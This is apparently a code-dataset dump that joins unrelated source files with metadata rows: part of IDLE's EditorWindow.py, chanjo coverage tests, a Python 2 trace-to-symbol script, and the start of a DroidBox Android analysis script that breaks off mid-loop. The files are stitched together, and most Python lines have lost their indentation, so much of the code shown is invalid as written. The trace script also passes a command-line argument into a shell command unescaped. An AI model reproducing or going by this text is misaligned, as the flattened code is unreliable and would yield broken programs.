"Update the indentwidth if changed and not using tabs in this window"
# Called from configDialog.py
if not self.usetabs:
self.indentwidth = idleConf.GetOption('main', 'Indent','num-spaces',
type='int')
def reset_help_menu_entries(self):
"Update the additional help entries on the Help menu"
help_list = idleConf.GetAllExtraHelpSourcesList()
helpmenu = self.menudict['help']
# first delete the extra help entries, if any
helpmenu_length = helpmenu.index(END)
if helpmenu_length > self.base_helpmenu_length:
helpmenu.delete((self.base_helpmenu_length + 1), helpmenu_length)
# then rebuild them
if help_list:
helpmenu.add_separator()
for entry in help_list:
cmd = self.__extra_help_callback(entry[1])
helpmenu.add_command(label=entry[0], command=cmd)
# and update the menu dictionary
self.menudict['help'] = helpmenu
def __extra_help_callback(self, helpfile):
"Create a callback with the helpfile value frozen at definition time"
def display_extra_help(helpfile=helpfile):
if not helpfile.startswith(('www', 'http')):
helpfile = os.path.normpath(helpfile)
if sys.platform[:3] == 'win':
try:
os.startfile(helpfile)
except WindowsError as why:
tkMessageBox.showerror(title='Document Start Failure',
message=str(why), parent=self.text)
else:
webbrowser.open(helpfile)
return display_extra_help
def update_recent_files_list(self, new_file=None):
"Load and update the recent files list and menus"
rf_list = []
if os.path.exists(self.recent_files_path):
with open(self.recent_files_path, 'r') as rf_list_file:
rf_list = rf_list_file.readlines()
if new_file:
new_file = os.path.abspath(new_file) + '\n'
if new_file in rf_list:
rf_list.remove(new_file) # move to top
rf_list.insert(0, new_file)
# clean and save the recent files list
bad_paths = []
for path in rf_list:
if '\0' in path or not os.path.exists(path[0:-1]):
bad_paths.append(path)
rf_list = [path for path in rf_list if path not in bad_paths]
ulchars = "1234567890ABCDEFGHIJK"
rf_list = rf_list[0:len(ulchars)]
try:
with open(self.recent_files_path, 'w') as rf_file:
rf_file.writelines(rf_list)
except IOError as err:
if not getattr(self.root, "recentfilelist_error_displayed", False):
self.root.recentfilelist_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update Recent Files list:\n%s'
% str(err),
parent=self.text)
# for each edit window instance, construct the recent files menu
for instance in self.top.instance_dict.keys():
menu = instance.recent_files_menu
menu.delete(0, END) # clear, and rebuild:
for i, file_name in enumerate(rf_list):
file_name = file_name.rstrip() # zap \n
# make unicode string to display non-ASCII chars correctly
ufile_name = self._filename_to_unicode(file_name)
callback = instance.__recent_file_callback(file_name)
menu.add_command(label=ulchars[i] + " " + ufile_name,
command=callback,
underline=0)
def __recent_file_callback(self, file_name):
def open_recent_file(fn_closure=file_name):
self.io.open(editFile=fn_closure)
return open_recent_file
def saved_change_hook(self):
short = self.short_title()
long = self.long_title()
if short and long:
title = short + " - " + long
elif short:
title = short
elif long:
title = long
else:
title = "Untitled"
icon = short or long or title
if not self.get_saved():
title = "*%s*" % title
icon = "*%s" % icon
self.top.wm_title(title)
self.top.wm_iconname(icon)
def get_saved(self):
return self.undo.get_saved()
def set_saved(self, flag):
self.undo.set_saved(flag)
def reset_undo(self):
self.undo.reset_undo()
def short_title(self):
filename = self.io.filename
if filename:
filename = os.path.basename(filename)
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(filename)
def long_title(self):
# return unicode string to display non-ASCII chars correctly
return self._filename_to_unicode(self.io.filename or "")
def center_insert_event(self, event):
self.center()
def center(self, mark="insert"):
text = self.text
top, bot = self.getwindowlines()
lineno = self.getlineno(mark)
height = bot - top
newtop = max(1, lineno - height//2)
text.yview(float(newtop))
def getwindowlines(self):
text = self.text
top = self.getlineno("@0,0")
bot = self.getlineno("@0,65535")
if top == bot and text.winfo_height() == 1:
# Geometry manager hasn't run yet
height = int(text['height'])
bot = top + height - 1
return top, bot
def getlineno(self, mark="insert"):
text = self.text
return int(float(text.index(mark)))
def get_geometry(self):
"Return (width, height, x, y)"
geom = self.top.wm_geometry()
m = re.match(r"(\d+)x(\d+)\+(-?\d+)\+(-?\d+)", geom)
tuple = (map(int, m.groups()))
return tuple
def close_event(self, event):
self.close()
def maybesave(self):
if self.io:
if not self.get_saved():
if self.top.state()!='normal':
self.top.deiconify()
self.top.lower()
self.top.lift()
return self.io.maybesave()
def close(self):
reply = self.maybesave()
if str(reply) != "cancel":
self._close()
return reply
def _close(self):
if self.io.filename:
self.update_recent_files_list(new_file=self.io.filename)
WindowList.unregister_callback(self.postwindowsmenu)
self.unload_extensions()
self.io.close()
self.io = None
self.undo = None
if self.color:
self.color.close(False)
self.color = None
self.text = None
self.tkinter_vars = None
self.per.close()
self.per = None
self.top.destroy()
if self.close_hook:
# unless override: unregister from flist, terminate if last window
self.close_hook()
def load_extensions(self):
self.extensions = {}
self.load_standard_extensions()
def unload_extensions(self):
for ins in self.extensions.values():
if hasattr(ins, "close"):
ins.close()
self.extensions = {}
def load_standard_extensions(self):
for name in self.get_standard_extension_names():
try:
self.load_extension(name)
except:
print "Failed to load extension", repr(name)
import traceback
traceback.print_exc()
def get_standard_extension_names(self):
return idleConf.GetExtensions(editor_only=True)
def load_extension(self, name):
try:
mod = __import__(name, globals(), locals(), [])
except ImportError:
print "\nFailed to import extension: ", name
return
cls = getattr(mod, name)
keydefs = idleConf.GetExtensionBindings(name)
if hasattr(cls, "menudefs"):
self.fill_menus(cls.menudefs, keydefs)
ins = cls(self)
self.extensions[name] = ins
if keydefs:
self.apply_bindings(keydefs)
for vevent in keydefs.keys():
methodname = vevent.replace("-", "_")
while methodname[:1] == '<':
methodname = methodname[1:]
while methodname[-1:] == '>':
methodname = methodname[:-1]
methodname = methodname + "_event"
if hasattr(ins, methodname):
self.text.bind(vevent, getattr(ins, methodname))
def apply_bindings(self, keydefs=None):
if keydefs is None:
keydefs = self.Bindings.default_keydefs
text = self.text
text.keydefs = keydefs
for event, keylist in keydefs.items():
if keylist:
text.event_add(event, *keylist)
def fill_menus(self, menudefs=None, keydefs=None):
"""Add appropriate entries to the menus and submenus
Menus that are absent or None in self.menudict are ignored.
"""
if menudefs is None:
menudefs = self.Bindings.menudefs
if keydefs is None:
keydefs = self.Bindings.default_keydefs
menudict = self.menudict
text = self.text
for mname, entrylist in menudefs:
menu = menudict.get(mname)
if not menu:
continue
for entry in entrylist:
if not entry:
menu.add_separator()
else:
label, eventname = entry
checkbutton = (label[:1] == '!')
if checkbutton:
label = label[1:]
underline, label = prepstr(label)
accelerator = get_accelerator(keydefs, eventname)
def command(text=text, eventname=eventname):
text.event_generate(eventname)
if checkbutton:
var = self.get_var_obj(eventname, BooleanVar)
menu.add_checkbutton(label=label, underline=underline,
command=command, accelerator=accelerator,
variable=var)
else:
menu.add_command(label=label, underline=underline,
command=command,
accelerator=accelerator)
def getvar(self, name):
var = self.get_var_obj(name)
if var:
value = var.get()
return value
else:
raise NameError, name
def setvar(self, name, value, vartype=None):
var = self.get_var_obj(name, vartype)
if var:
var.set(value)
else:
raise NameError, name
def get_var_obj(self, name, vartype=None):
var = self.tkinter_vars.get(name)
if not var and vartype:
# create a Tkinter variable object with self.text as master:
self.tkinter_vars[name] = var = vartype(self.text)
return var
# Tk implementations of "virtual text methods" -- each platform
# reusing IDLE's support code needs to define these for its GUI's
# flavor of widget.
# Is character at text_index in a Python string? Return 0 for
# "guaranteed no", true for anything else. This info is expensive
# to compute ab initio, but is probably already known by the
# platform's colorizer.
def is_char_in_string(self, text_index):
if self.color:
# Return true iff colorizer hasn't (re)gotten this far
# yet, or the character is tagged as being in a string
return self.text.tag_prevrange("TODO", text_index) or \
"STRING" in self.text.tag_names(text_index)
else:
# The colorizer is missing: assume the worst
return 1
# If a selection is defined in the text widget, return (start,
# end) as Tkinter text indices, otherwise return (None, None)
def get_selection_indices(self):
try:
first = self.text.index("sel.first")
last = self.text.index("sel.last")
return first, last
except TclError:
return None, None
# Return the text widget's current view of what a tab stop means
# (equivalent width in spaces).
def get_tabwidth(self):
current = self.text['tabs'] or TK_TABWIDTH_DEFAULT
return int(current)
# Set the text widget's current view of what a tab stop means.
def set_tabwidth(self, newtabwidth):
text = self.text
if self.get_tabwidth() != newtabwidth:
pixels = text.tk.call("font", "measure", text["font"],
"-displayof", text.master,
"n" * newtabwidth)
text.configure(tabs=pixels)
# If ispythonsource and guess are true, guess a good value for
# indentwidth based on file content (if possible), and if
# indentwidth != tabwidth set usetabs false.
# In any case, adjust the Text widget's view of what a tab
# character means.
def set_indentation_params(self, ispythonsource, guess=True):
if guess and ispythonsource:
i = self.guess_indent()
if 2 <= i <= 8:
self.indentwidth = i
if self.indentwidth != self.tabwidth:
self.usetabs = False
self.set_tabwidth(self.tabwidth)
def smart_backspace_event(self, event):
text = self.text
first, last = self.get_selection_indices()
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
return "break"
# Delete whitespace left, until hitting a real char or closest
# preceding virtual tab stop.
chars = text.get("insert linestart", "insert")
if chars == '':
if text.compare("insert", ">", "1.0"):
# easy: delete preceding newline
text.delete("insert-1c")
else:
text.bell() # at start of buffer
return "break"
if chars[-1] not in " \t":
# easy: delete preceding real char
text.delete("insert-1c")
return "break"
# Ick. It may require *inserting* spaces if we back up over a
# tab character! This is written to be clear, not fast.
tabwidth = self.tabwidth
have = len(chars.expandtabs(tabwidth))
assert have > 0
want = ((have - 1) // self.indentwidth) * self.indentwidth
# Debug prompt is multilined....
if self.context_use_ps1:
last_line_of_prompt = sys.ps1.split('\n')[-1]
else:
last_line_of_prompt = ''
ncharsdeleted = 0
while 1:
if chars == last_line_of_prompt:
break
chars = chars[:-1]
ncharsdeleted = ncharsdeleted + 1
have = len(chars.expandtabs(tabwidth))
if have <= want or chars[-1] not in " \t":
break
text.undo_block_start()
text.delete("insert-%dc" % ncharsdeleted, "insert")
if have < want:
text.insert("insert", ' ' * (want - have))
text.undo_block_stop()
return "break"
def smart_indent_event(self, event):
# if intraline selection:
# delete it
# elif multiline selection:
# do indent-region
# else:
# indent one level
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
if index2line(first) != index2line(last):
return self.indent_region_event(event)
text.delete(first, last)
text.mark_set("insert", first)
prefix = text.get("insert linestart", "insert")
raw, effective = classifyws(prefix, self.tabwidth)
if raw == len(prefix):
# only whitespace to the left
self.reindent_to(effective + self.indentwidth)
else:
# tab to the next 'stop' within or to right of line's text:
if self.usetabs:
pad = '\t'
else:
effective = len(prefix.expandtabs(self.tabwidth))
n = self.indentwidth
pad = ' ' * (n - effective % n)
text.insert("insert", pad)
text.see("insert")
return "break"
finally:
text.undo_block_stop()
def newline_and_indent_event(self, event):
text = self.text
first, last = self.get_selection_indices()
text.undo_block_start()
try:
if first and last:
text.delete(first, last)
text.mark_set("insert", first)
line = text.get("insert linestart", "insert")
i, n = 0, len(line)
while i < n and line[i] in " \t":
i = i+1
if i == n:
# the cursor is in or at leading indentation in a continuation
# line; just inject an empty line at the start
text.insert("insert linestart", '\n')
return "break"
indent = line[:i]
# strip whitespace before insert point unless it's in the prompt
i = 0
last_line_of_prompt = sys.ps1.split('\n')[-1]
while line and line[-1] in " \t" and line != last_line_of_prompt:
line = line[:-1]
i = i+1
if i:
text.delete("insert - %d chars" % i, "insert")
# strip whitespace after insert point
while text.get("insert") in " \t":
text.delete("insert")
# start new line
text.insert("insert", '\n')
            # adjust indentation for continuations and block open/close;
            # first we need to find the last stmt
lno = index2line(text.index('insert'))
y = PyParse.Parser(self.indentwidth, self.tabwidth)
if not self.context_use_ps1:
for context in self.num_context_lines:
startat = max(lno - context, 1)
startatindex = repr(startat) + ".0"
rawtext = text.get(startatindex, "insert")
y.set_str(rawtext)
bod = y.find_good_parse_start(
self.context_use_ps1,
self._build_char_in_string_func(startatindex))
if bod is not None or startat == 1:
break
y.set_lo(bod or 0)
else:
r = text.tag_prevrange("console", "insert")
if r:
startatindex = r[1]
else:
startatindex = "1.0"
rawtext = text.get(startatindex, "insert")
y.set_str(rawtext)
y.set_lo(0)
c = y.get_continuation_type()
if c != PyParse.C_NONE:
# The current stmt hasn't ended yet.
if c == PyParse.C_STRING_FIRST_LINE:
# after the first line of a string; do not indent at all
pass
elif c == PyParse.C_STRING_NEXT_LINES:
# inside a string which started before this line;
# just mimic the current indent
text.insert("insert", indent)
elif c == PyParse.C_BRACKET:
# line up with the first (if any) element of the
# last open bracket structure; else indent one
# level beyond the indent of the line with the
# last open bracket
self.reindent_to(y.compute_bracket_indent())
elif c == PyParse.C_BACKSLASH:
# if more than one line in this stmt already, just
# mimic the current indent; else if initial line
# has a start on an assignment stmt, indent to
# beyond leftmost =; else to beyond first chunk of
# non-whitespace on initial line
if y.get_num_lines_in_stmt() > 1:
text.insert("insert", indent)
else:
self.reindent_to(y.compute_backslash_indent())
else:
assert 0, "bogus continuation type %r" % (c,)
return "break"
# This line starts a brand new stmt; indent relative to
# indentation of initial line of closest preceding
# interesting stmt.
indent = y.get_base_indent_string()
text.insert("insert", indent)
if y.is_block_opener():
self.smart_indent_event(event)
elif indent and y.is_block_closer():
self.smart_backspace_event(event)
return "break"
finally:
text.see("insert")
text.undo_block_stop()
# Our editwin provides a is_char_in_string function that works
# with a Tk text index, but PyParse only knows about offsets into
# a string. This builds a function for PyParse that accepts an
# offset.
def _build_char_in_string_func(self, startindex):
def inner(offset, _startindex=startindex,
_icis=self.is_char_in_string):
return _icis(_startindex + "+%dc" % offset)
return inner
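    # For example, with startindex "10.0" the returned function maps inner(5)
    # to is_char_in_string("10.0+5c"), i.e. the character five columns past
    # the start of line 10 in Tk index arithmetic.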
def indent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = effective + self.indentwidth
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def dedent_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, self.tabwidth)
effective = max(effective - self.indentwidth, 0)
lines[pos] = self._make_blanks(effective) + line[raw:]
self.set_region(head, tail, chars, lines)
return "break"
def comment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines) - 1):
line = lines[pos]
lines[pos] = '##' + line
self.set_region(head, tail, chars, lines)
def uncomment_region_event(self, event):
head, tail, chars, lines = self.get_region()
for pos in range(len(lines)):
line = lines[pos]
if not line:
continue
if line[:2] == '##':
line = line[2:]
elif line[:1] == '#':
line = line[1:]
lines[pos] = line
self.set_region(head, tail, chars, lines)
def tabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
line = lines[pos]
if line:
raw, effective = classifyws(line, tabwidth)
ntabs, nspaces = divmod(effective, tabwidth)
lines[pos] = '\t' * ntabs + ' ' * nspaces + line[raw:]
self.set_region(head, tail, chars, lines)
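    # For example, with a tab width of 8 a line indented by 10 spaces becomes
    # one tab plus two spaces followed by the original text.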
def untabify_region_event(self, event):
head, tail, chars, lines = self.get_region()
tabwidth = self._asktabwidth()
if tabwidth is None: return
for pos in range(len(lines)):
lines[pos] = lines[pos].expandtabs(tabwidth)
self.set_region(head, tail, chars, lines)
def toggle_tabs_event(self, event):
if self.askyesno(
"Toggle tabs",
"Turn tabs " + ("on", "off")[self.usetabs] +
"?\nIndent width " +
("will be", "remains at")[self.usetabs] + " 8." +
"\n Note: a tab is always 8 columns",
parent=self.text):
self.usetabs = not self.usetabs
# Try to prevent inconsistent indentation.
# User must change indent width manually after using tabs.
self.indentwidth = 8
return "break"
# XXX this isn't bound to anything -- see tabwidth comments
## def change_tabwidth_event(self, event):
## new = self._asktabwidth()
## if new != self.tabwidth:
## self.tabwidth = new
## self.set_indentation_params(0, guess=0)
## return "break"
def change_indentwidth_event(self, event):
new = self.askinteger(
"Indent width",
"New indent width (2-16)\n(Always use 8 when using tabs)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
if new and new != self.indentwidth and not self.usetabs:
self.indentwidth = new
return "break"
def get_region(self):
text = self.text
first, last = self.get_selection_indices()
if first and last:
head = text.index(first + " linestart")
tail = text.index(last + "-1c lineend +1c")
else:
head = text.index("insert linestart")
tail = text.index("insert lineend +1c")
chars = text.get(head, tail)
lines = chars.split("\n")
return head, tail, chars, lines
def set_region(self, head, tail, chars, lines):
text = self.text
newchars = "\n".join(lines)
if newchars == chars:
text.bell()
return
text.tag_remove("sel", "1.0", "end")
text.mark_set("insert", head)
text.undo_block_start()
text.delete(head, tail)
text.insert(head, newchars)
text.undo_block_stop()
text.tag_add("sel", head, "insert")
# Make string that displays as n leading blanks.
def _make_blanks(self, n):
if self.usetabs:
ntabs, nspaces = divmod(n, self.tabwidth)
return '\t' * ntabs + ' ' * nspaces
else:
return ' ' * n
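    # For example, _make_blanks(10) yields '\t' plus two spaces when usetabs
    # is true and tabwidth is 8, and ten spaces otherwise.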
# Delete from beginning of line to insert point, then reinsert
# column logical (meaning use tabs if appropriate) spaces.
def reindent_to(self, column):
text = self.text
text.undo_block_start()
if text.compare("insert linestart", "!=", "insert"):
text.delete("insert linestart", "insert")
if column:
text.insert("insert", self._make_blanks(column))
text.undo_block_stop()
def _asktabwidth(self):
return self.askinteger(
"Tab width",
"Columns per tab? (2-16)",
parent=self.text,
initialvalue=self.indentwidth,
minvalue=2,
maxvalue=16)
# Guess indentwidth from text content.
# Return guessed indentwidth. This should not be believed unless
# it's in a reasonable range (e.g., it will be 0 if no indented
# blocks are found).
def guess_indent(self):
opener, indented = IndentSearcher(self.text, self.tabwidth).run()
if opener and indented:
raw, indentsmall = classifyws(opener, self.tabwidth)
raw, indentlarge = classifyws(indented, self.tabwidth)
else:
indentsmall = indentlarge = 0
return indentlarge - indentsmall
# "line.col" -> line, as an int
def index2line(index):
return int(float(index))
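# For example, index2line("12.4") returns 12.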
# Look at the leading whitespace in s.
# Return pair (# of leading ws characters,
# effective # of leading blanks after expanding
# tabs to width tabwidth)
def classifyws(s, tabwidth):
raw = effective = 0
for ch in s:
if ch == ' ':
raw = raw + 1
effective = effective + 1
elif ch == '\t':
raw = raw + 1
effective = (effective // tabwidth + 1) * tabwidth
else:
break
return raw, effective
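# For example, classifyws("\t  x", 8) returns (3, 10): three raw whitespace
# characters whose effective width is one 8-column tab stop plus two spaces.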
import tokenize
_tokenize = tokenize
del tokenize
class IndentSearcher(object):
# .run() chews over the Text widget, looking for a block opener
# and the stmt following it. Returns a pair,
# (line containing block opener, line containing stmt)
# Either or both may be None.
def __init__(self, text, tabwidth):
self.text = text
self.tabwidth = tabwidth
self.i = self.finished = 0
self.blkopenline = self.indentedline = None
def readline(self):
if self.finished:
return ""
i = self.i = self.i + 1
mark = repr(i) + ".0"
if self.text.compare(mark, ">=", "end"):
return ""
return self.text.get(mark, mark + " lineend+1c")
def tokeneater(self, type, token, start, end, line,
INDENT=_tokenize.INDENT,
NAME=_tokenize.NAME,
OPENERS=('class', 'def', 'for', 'if', 'try', 'while')):
if self.finished:
pass
elif type == NAME and token in OPENERS:
self.blkopenline = line
elif type == INDENT and self.blkopenline:
self.indentedline = line
self.finished = 1
def run(self):
save_tabsize = _tokenize.tabsize
_tokenize.tabsize = self.tabwidth
try:
try:
_tokenize.tokenize(self.readline, self.tokeneater)
except (_tokenize.TokenError, SyntaxError):
# since we cut off the tokenizer early, we can trigger
# spurious errors
pass
finally:
_tokenize.tabsize = save_tabsize
return self.blkopenline, self.indentedline
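    # For example, if the widget's first two lines are "def f():" and
    # "    pass", run() returns ("def f():\n", "    pass\n"), from which
    # guess_indent() above derives an indent width of 4.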
### end autoindent code ###
def prepstr(s):
# Helper to extract the underscore from a string, e.g.
# prepstr("Co_py") returns (2, "Copy").
i = s.find('_')
if i >= 0:
s = s[:i] + s[i+1:]
return i, s
keynames = {
'bracketleft': '[',
'bracketright': ']',
'slash': '/',
}
def get_accelerator(keydefs, eventname):
keylist = keydefs.get(eventname)
# issue10940: temporary workaround to prevent hang with OS X Cocoa Tk 8.5
# if not keylist:
if (not keylist) or (macosxSupport.runningAsOSXApp() and eventname in {
"<<open-module>>",
"<<goto-line>>",
"<<change-indentwidth>>"}):
return ""
s = keylist[0]
s = re.sub(r"-[a-z]\b", lambda m: m.group().upper(), s)
s = re.sub(r"\b\w+\b", lambda m: keynames.get(m.group(), m.group()), s)
s = re.sub("Key-", "", s)
s = re.sub("Cancel","Ctrl-Break",s) # dscherer@cmu.edu
s = re.sub("Control-", "Ctrl-", s)
s = re.sub("-", "+", s)
s = re.sub("><", " ", s)
s = re.sub("<", "", s)
s = re.sub(">", "", s)
return s
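# For example, a key definition list starting with "<Control-Key-x>" is
# rendered as the accelerator string "Ctrl+X".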
def fixwordbreaks(root):
# Make sure that Tk's double-click and next/previous word
# operations use our definition of a word (i.e. an identifier)
tk = root.tk
tk.call('tcl_wordBreakAfter', 'a b', 0) # make sure word.tcl is loaded
tk.call('set', 'tcl_wordchars', '[a-zA-Z0-9_]')
tk.call('set', 'tcl_nonwordchars', '[^a-zA-Z0-9_]')
def test():
root = Tk()
fixwordbreaks(root)
root.withdraw()
if sys.argv[1:]:
filename = sys.argv[1]
else:
filename = None
edit = EditorWindow(root=root, filename=filename)
edit.set_close_hook(root.quit)
edit.text.bind("<<close-all-windows>>", edit.close_event)
root.mainloop()
root.destroy()
if __name__ == '__main__':
test()
|
ianyh/heroku-buildpack-python-opencv
|
vendor/.heroku/lib/python2.7/idlelib/EditorWindow.py
|
Python
|
mit
| 66,031 | 0.001817 |
"""Test calculate module"""
from chanjo.store.models import Sample
def test_mean(populated_db):
"""Test for calculating mean coverage"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics
query = populated_db.mean()
# THEN the results should group over 2 "rows"
results = query.all()
assert len(results) == 2
sample_ids = set(result[0] for result in results)
assert sample_ids == set(['sample', 'sample2']) # sample id
result = results[0]
for metric in filter(None, result[1:]):
assert isinstance(metric, float)
def test_mean_with_samples(populated_db):
"""Test for caluclating mean with samples"""
# GIVEN a database loaded with 2 samples
assert Sample.query.count() == 2
# WHEN calculating mean values across metrics for a particular sample
sample_id = 'sample'
query = populated_db.mean(sample_ids=[sample_id])
# THEN the results should be limited to that sample
results = query.all()
assert len(results) == 1
result = results[0]
assert result[0] == sample_id
def test_gene(populated_db):
"""Test for calculating gene metrics"""
# GIVEN a database populated with a single sample
assert Sample.query.count() == 2
# WHEN calculating average metrics for a gene
gene_id = 28706
query = populated_db.gene_metrics(gene_id)
# THEN the results should add up to a single row
results = query.all()
assert len(results) == 2
result = results[0]
assert result[0] == 'sample'
assert result[-1] == gene_id
def test_sample_coverage(populated_db):
"""Test for OMIM coverage"""
# GIVEN a database populated with two samples
assert Sample.query.count() == 2
sample_ids = ('sample', 'sample2')
gene_ids = (14825, 28706)
# WHEN calculating coverage for sample 'sample' on gene 14825
query = populated_db.sample_coverage(sample_ids=sample_ids, genes=gene_ids)
# THEN query should be a dict with samples as keys, where each sample
# is a dict with keys mean_coverage and mean completeness
assert set(query.keys()) == set(sample_ids)
for _, value in query.items():
assert set(value.keys()) == set(['mean_coverage', 'mean_completeness'])
|
robinandeer/chanjo
|
tests/test_calculate.py
|
Python
|
mit
| 2,295 | 0 |
#!/usr/bin/python
# -*- encoding: utf-8 -*-
#
# Print the sequence of function calls from the Imperas trace file.
#
import sys, string, subprocess, bisect
if len(sys.argv) != 3:
print "Usage: simtrace file.trace vmunix.elf"
sys.exit (1)
# Extract the list of symbols from the binary executable.
nm_command = subprocess.Popen ("nm "+sys.argv[2], shell = True, stdout = subprocess.PIPE)
table = {}
max_addr = 0
for line in nm_command.stdout.readlines():
word = line.split()
addr = int(word[0], 16)
func = word[2]
table[addr] = func
if addr > max_addr:
max_addr = addr
#print "%08x = %s" % (addr, func)
table_keys = sorted(table.keys())
#print table_keys
# Find a name of the function for the given address.
# Return the name and the offset.
def find_function (addr):
if addr <= max_addr:
i = bisect.bisect_right(table_keys, addr)
if i > 0:
last = table_keys[i-1]
return (table[last], addr - last)
return ("", 0)
# Print a function name for the given address.
last_func = ""
def process_instruction(addr, level):
#print "--- process_instruction(%#x)" % addr
global last_func
(func, offset) = find_function (addr)
if func != last_func:
if offset == 0:
print "%08x : %*s%s" % (addr, level*2, "", func)
else:
print "%08x : %*s%s + %u" % (addr, level*2, "", func, offset)
last_func = func
# Check whether the string is a hex number
hex_digits = set(string.hexdigits)
def is_hex(s):
return all(c in hex_digits for c in s)
# Read the trace file.
trace_file = open (sys.argv[1])
pc = 0
op = ""
last_op = ""
level = 0
for line in trace_file.readlines():
word = line.split()
if len(word) > 0 and word[0] == "---":
if pc > max_addr and len(word) == 6 and word[1] == "I/O" and \
word[2] == "Read" and word[5] == "U4STA":
# Skip bootloader timeout
continue
# Print i/o events.
print line.strip()
continue
if len(word) > 1 and word[0] == "Info" and word[1] == "(MIPS32_EXCEPT)":
# Print exceptions.
print "---", string.join(word[3:])
continue
if len(word) < 7:
continue
va = word[2]
pa = word[3]
cca = word[4]
if not (word[1] == ":" and
len(va) == 8 and len(pa) == 8 and
is_hex(va) and is_hex(pa)):
continue
pc = int(va, 16)
# Skip bootloader region.
if pc > max_addr:
continue
if cca != "2:" and cca != "3:":
print "Warning: unexpected CCA value!"
if last_op == "JAL":
level = level + 1
elif last_op == "JR":
level = level - 1
#print pc, ":", string.join(word[6:])
process_instruction(pc, level)
# Keep the history of two last instructions
last_op = op
op = word[6]
if word[6] == "JAL" or word[6] == "JALR":
op = "JAL"
elif (word[6] == "JR" or word[6] == "JR.HB") and word[7] == "$31":
op = "JR"
else:
op = ""
# Print the last executed address.
if pc != 0:
last_func = ""
print "=== Stopped at: ==="
process_instruction(pc, 0)
|
sergev/vak-opensource
|
languages/python/simtrace.py
|
Python
|
apache-2.0
| 3,176 | 0.007557 |
# I have to modify droidbox scripts to make them work with droidbot
# This is a compatible version which generates a report in the same format as the original DroidBox
__author__ = 'yuanchun'
################################################################################
# (c) 2011, The Honeynet Project
# Author: Patrik Lantz patrik@pjlantz.com and Laurent Delosieres ldelosieres@hispasec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
################################################################################
"""
Dynamically analyze Android applications
This script allows you to dynamically analyze Android applications.
It installs, runs, and analyzes Android applications.
At the end of each analysis, it outputs the Android application's characteristics in JSON.
Please keep in mind that all data received/sent,
read/written are shown in hexadecimal since the handled data can contain binary data.
"""
import json, time, signal, os, sys
import zipfile
import subprocess
import threading
from threading import Thread
from xml.dom import minidom
from subprocess import call, PIPE, Popen
from utils import AXMLPrinter
import hashlib
tags = {0x1: "TAINT_LOCATION", 0x2: "TAINT_CONTACTS", 0x4: "TAINT_MIC", 0x8: "TAINT_PHONE_NUMBER",
0x10: "TAINT_LOCATION_GPS", 0x20: "TAINT_LOCATION_NET", 0x40: "TAINT_LOCATION_LAST", 0x80: "TAINT_CAMERA",
0x100: "TAINT_ACCELEROMETER", 0x200: "TAINT_SMS", 0x400: "TAINT_IMEI", 0x800: "TAINT_IMSI",
0x1000: "TAINT_ICCID", 0x2000: "TAINT_DEVICE_SN", 0x4000: "TAINT_ACCOUNT", 0x8000: "TAINT_BROWSER",
0x10000: "TAINT_OTHERDB", 0x20000: "TAINT_FILECONTENT", 0x40000: "TAINT_PACKAGE", 0x80000: "TAINT_CALL_LOG",
0x100000: "TAINT_EMAIL", 0x200000: "TAINT_CALENDAR", 0x400000: "TAINT_SETTINGS"}
class LostADBException(Exception):
pass
class DroidBox(object):
def __init__(self, output_dir=None):
self.sendsms = {}
self.phonecalls = {}
self.cryptousage = {}
self.dexclass = {}
self.dataleaks = {}
self.opennet = {}
self.sendnet = {}
self.recvnet = {}
self.closenet = {}
self.fdaccess = {}
self.servicestart = {}
self.accessedfiles = {}
self.enabled = True
self.adb = None
self.application = None
self.apk_name = None
self.apk_hashes = None
self.applicationStarted = 0
self.is_counting_logs = False
self.timer = None
if output_dir:
self.output_dir = output_dir
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
else:
            # Possibility that no output files are generated
self.output_dir = None
def set_apk(self, apk_name):
if not self.enabled:
return
if apk_name is None:
return
# APK existing?
if not os.path.isfile(apk_name):
print("File %s not found" % apk_name)
sys.exit(1)
self.apk_name = os.path.abspath(apk_name)
self.application = Application(apk_name)
ret = self.application.processAPK()
# Error during the APK processing?
if ret == 0:
print("Failed to analyze the APK. Terminate the analysis.")
sys.exit(1)
main_activity = self.application.getMainActivity()
package_name = self.application.getPackage()
self.apk_hashes = self.application.getHashes()
        # No main activity found? Return an error
if main_activity == None:
print("No activity to start. Terminate the analysis.")
sys.exit(1)
# No packages identified? Return an error
if package_name == None:
print("No package found. Terminate the analysis.")
sys.exit(1)
# Execute the application
call(["adb", "logcat", "-c"])
ret = call(['monkeyrunner', 'monkeyrunner.py', apk_name,
package_name, main_activity], stderr=None,
cwd=os.path.dirname(os.path.realpath(__file__)))
if (ret == 1):
print("Failed to execute the application.")
sys.exit(1)
print("Starting the activity %s..." % main_activity)
# By default the application has not started
self.applicationStarted = 0
stringApplicationStarted = "Start proc %s" % package_name
# Open the adb logcat
if self.adb is None:
self.adb = Popen(["adb", "logcat", "DroidBox:W", "dalvikvm:W", "ActivityManager:I"], stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Wait for the application to start
while 1:
try:
logcatInput = self.adb.stdout.readline()
if not logcatInput:
raise Exception("We have lost the connection with ADB.")
# Application started?
if (stringApplicationStarted in logcatInput):
